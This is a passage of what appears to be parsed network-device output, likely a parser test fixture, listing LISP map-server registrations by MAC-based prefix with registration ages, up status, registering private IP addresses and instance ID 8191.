"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"649e.f3ff.9791/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"649e.f3ff.c886/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"649e.f3ff.cca8/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"649e.f3ff.e91c/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"649e.f3ff.eb96/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"649e.f3ff.ec62/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"649e.f3ff.ecfd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"649e.f3ff.f75c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"649e.f3ff.0c0e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"649e.f3ff.306c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"649e.f3ff.594b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"64f6.9dff.c957/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"64f6.9dff.275f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"64f6.9dff.83bd/48": {
"last_register": "04:03:45",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8191,
},
"64f6.9dff.8668/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"64f6.9dff.8b20/48": {
"last_register": "04:02:53",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"682c.7bff.556b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.55dd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"682c.7bff.55ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.55fe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"682c.7bff.589e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"682c.7bff.7736/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"682c.7bff.9ee7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"682c.7bff.a3af/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"682c.7bff.a463/48": {
"last_register": "00:36:44",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"682c.7bff.a841/48": {
"last_register": "09:56:41",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"682c.7bff.aaa5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.acc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"682c.7bff.aeb3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"682c.7bff.b09c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"682c.7bff.b012/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"682c.7bff.b18c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.b1d7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"682c.7bff.b1e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.b261/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.b285/48": {
"last_register": "01:56:00",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"682c.7bff.b28b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"682c.7bff.b3ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"682c.7bff.b3b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"682c.7bff.b336/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"682c.7bff.b35a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"682c.7bff.b4ce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"682c.7bff.b411/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"682c.7bff.b438/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"682c.7bff.b5dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"682c.7bff.b51c/48": {
"last_register": "03:41:14",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"6886.a7ff.e080/48": {
"last_register": "1d01h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"6886.a7ff.e14e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"6886.a7ff.e287/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"6886.a7ff.f68e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"68bd.abff.4b18/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.179:15443",
"inst_id": 8191,
},
"68bd.abff.bfba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"68bd.abff.c1c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"6c6c.d3ff.4497/48": {
"last_register": "1d03h",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"6c71.0dff.3759/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"6c71.0dff.47e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"6c71.0dff.7f63/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"6c71.0dff.86b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"7001.b5ff.962d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"7001.b5ff.9776/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"7001.b5ff.97b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7001.b5ff.9739/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"7001.b5ff.973d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7001.b5ff.9755/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7001.b5ff.988c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"7001.b5ff.988e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"7001.b5ff.9894/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"7001.b5ff.9896/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"7001.b5ff.65109/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7001.b5ff.99b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7001.b5ff.99cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"7001.b5ff.990b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7001.b5ff.a245/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7001.b5ff.a6e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7001.b5ff.e9b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"7001.b5ff.f4ad/48": {
"last_register": "06:18:28",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"700b.4fff.0274/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"7035.09ff.68f2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7035.09ff.6caf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7035.09ff.9745/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7035.09ff.106c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"706e.6dff.b286/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"706e.6dff.b386/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"70e4.22ff.492f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"70e4.22ff.4967/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"70e4.22ff.1b6e/48": {
"last_register": "2d00h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"70f0.96ff.3eca/48": {
"last_register": "1d22h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7426.acff.f513/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"7426.acff.f5c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7426.acff.f899/48": {
"last_register": "4d16h",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"7488.bbff.1a0c/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"7488.bbff.c15d/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"7488.bbff.d507/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"74a0.2fff.57cb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"74a0.2fff.5d12/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"74a0.2fff.6c37/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"74a0.2fff.6e4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"74a0.2fff.73f1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"74a0.2fff.75be/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"74a0.2fff.7ae9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"74a0.2fff.ada2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"74a0.2fff.bc84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"74a0.2fff.bedc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"7802.b1ff.be7e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"7872.5dff.7bd9/48": {
"last_register": "1d05h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7872.5dff.4c63/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"7872.5dff.0055/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"78da.6eff.42e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"7c95.f3ff.c98c/48": {
"last_register": "00:23:00",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"80e8.6fff.be14/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"881d.fcff.57f7/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"881d.fcff.6f13/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"881d.fcff.7566/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"8843.e1ff.b66b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"8843.e1ff.f0cf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"8843.e1ff.37d0/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"8843.e1ff.82f6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"8875.56ff.7346/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"8875.56ff.74ee/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"8875.56ff.cbc5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"8cb6.4fff.45a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"94d4.69ff.e681/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"94d4.69ff.e606/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"94d4.69ff.e711/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"94d4.69ff.e774/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"9c57.adff.4368/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8191,
},
"9c57.adff.43c8/48": {
"last_register": "10:03:29",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"9c57.adff.43ec/48": {
"last_register": "01:43:20",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"9c57.adff.447c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8191,
},
"9c57.adff.44a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8191,
},
"9c57.adff.44c6/48": {
"last_register": "00:02:16",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"9c57.adff.44ee/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8191,
},
"9c57.adff.4401/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"9c57.adff.4518/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"9c57.adff.453f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8191,
},
"9c57.adff.4558/48": {
"last_register": "1d02h",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"9c57.adff.456f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8191,
},
"9c57.adff.4577/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8191,
},
"9c57.adff.4657/48": {
"last_register": "00:09:33",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"9c57.adff.465e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"9c57.adff.46ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"9c57.adff.4743/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"9c57.adff.47ad/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8191,
},
"9c57.adff.47ae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"9c57.adff.47f1/48": {
"last_register": "3d16h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"9c57.adff.4917/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"9c57.adff.494c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"9c57.adff.4a15/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"9c57.adff.4abe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"9c57.adff.4ac5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8191,
},
"a456.30ff.041f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"a46c.2aff.f113/48": {
"last_register": "2d03h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"a89d.21ff.83ba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"a89d.21ff.9c56/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"a89d.21ff.9c64/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"a89d.21ff.9c6c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"ac7e.8aff.ccb2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"ac7e.8aff.db40/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"ac7e.8aff.ed9e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.eee3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.f7fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"ac7e.8aff.f73c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"ac7e.8aff.1518/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.1b8e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.3f10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"ac7e.8aff.52b6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.585c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"ac7e.8aff.5868/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.5961/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"ac7e.8aff.5a03/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"ac7e.8aff.5cc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.6372/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"ac7e.8aff.663c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"ac7e.8aff.6837/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.69ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.6bc1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"ac7e.8aff.6be5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.6b04/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"ac7e.8aff.75a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"ac7e.8aff.7c9b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"ac7e.8aff.4217/48": {
"last_register": "2w0d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.428d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.8e74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"ac7e.8aff.9450/48": {
"last_register": "1d08h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"ac7e.8aff.94b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"ac7e.8aff.9750/48": {
"last_register": "1w4d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"ac7e.8aff.b5bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"aca0.16ff.920f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"aca0.16ff.4672/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"aca0.16ff.dd49/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"aca0.16ff.e748/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"b000.b4ff.de10/48": {
"last_register": "2d23h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"b000.b4ff.de79/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"b000.b4ff.e29f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"b026.80ff.3bbb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"b026.80ff.5a89/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"b026.80ff.ec67/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"b026.80ff.ec72/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"b026.80ff.ec7b/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"b8be.bfff.9415/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"bc16.f5ff.523c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"bcf1.f2ff.25b3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"c062.6bff.7d07/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"c40a.cbff.e5ea/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8191,
},
"c40a.cbff.4920/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"c414.3cff.3a0e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"c414.3cff.3d6d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"c414.3cff.6101/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"c414.3cff.6129/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
